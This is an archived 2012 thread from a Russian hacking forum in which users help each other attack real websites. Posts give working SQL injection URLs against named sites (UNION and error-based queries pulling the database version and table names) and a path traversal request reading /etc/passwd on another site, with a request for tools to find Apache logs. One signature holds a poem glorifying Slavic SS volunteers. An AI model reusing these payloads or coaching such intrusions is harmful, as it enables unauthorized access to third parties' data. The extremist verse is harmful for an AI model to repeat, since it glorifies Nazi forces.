ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.03.2012, 00:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от Fooog
Fooog said:
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html
|
|
|
|
14.03.2012, 02:30
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
http://wmrace.ru/buy.php?carid=-3'+union+select+1,2,3,4,5,6,7,8,9,10,11--+
Помогите раскрутить, пока что смог - это узнать версию:
Код:
Code:
http://wmrace.ru/buy.php?carid=-3'%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))--+
да, прямого вывода на стр. нету
upd:
antichat:antichat |
|
|
14.03.2012, 02:49
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),fl oor(rand(0)*2))+having+min(0)+or+1--+
как error-based крути.
upd:
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
|
|
|
|
14.03.2012, 05:33
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),fl oor(rand(0)*2))+having+min(0)+or+1--+
как error-based крути.
upd:
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
Спасибо, жаль, не успел посмотреть, прикрыли, оперативно.
А что выводил этот запрос?
Сообщение от None
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
|
|
|
|
14.03.2012, 11:25
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
все таблицы из information_schema.tables выводил.
Сообщение от None
На сайт 8 марта была произведена атака с целью стереть все данные о балансе аккаунтов и выплат.
ты не первый) |
|
|
|
14.03.2012, 12:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от xcedz
xcedz said:
Всё там норм
та не норм, пишет же ошибку
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and ('DzDB'='DzDB')' at line 1
что я там неправильно подставил?
http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1 ,table_name,3,4,5,6,7+from+information_schema,tabl es+and+%28%27DzDB%27=%27DzDB
|
|
|
|
14.03.2012, 12:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
http://zapoved.ru/?act=docs_more&id=-3%27%29+UNION+SELECT+1,table_name,3,4,5,6,7+from+i nformation_schema.tables%23
что не так? =\
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
14.03.2012, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Реебят, а можете мне обьямнить какой толк от такой уязвимости как include(LFI)? ну допустим я смогу просмотреть файл etc/passwd а толк от него?, увижу пути и логины узеров без паролей и всё, может я чегото ещо не знаю, дайте линки почитаю
|
|
|
|
14.03.2012, 14:30
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
/threadnav12123-1-10.html
/thread23501.html
/thread91807.html
/thread98525.html
|
|
|
|
14.03.2012, 15:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от faza02
faza02 said:
/threadnav12123-1-10.html
/thread23501.html
/thread91807.html
/thread98525.html
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
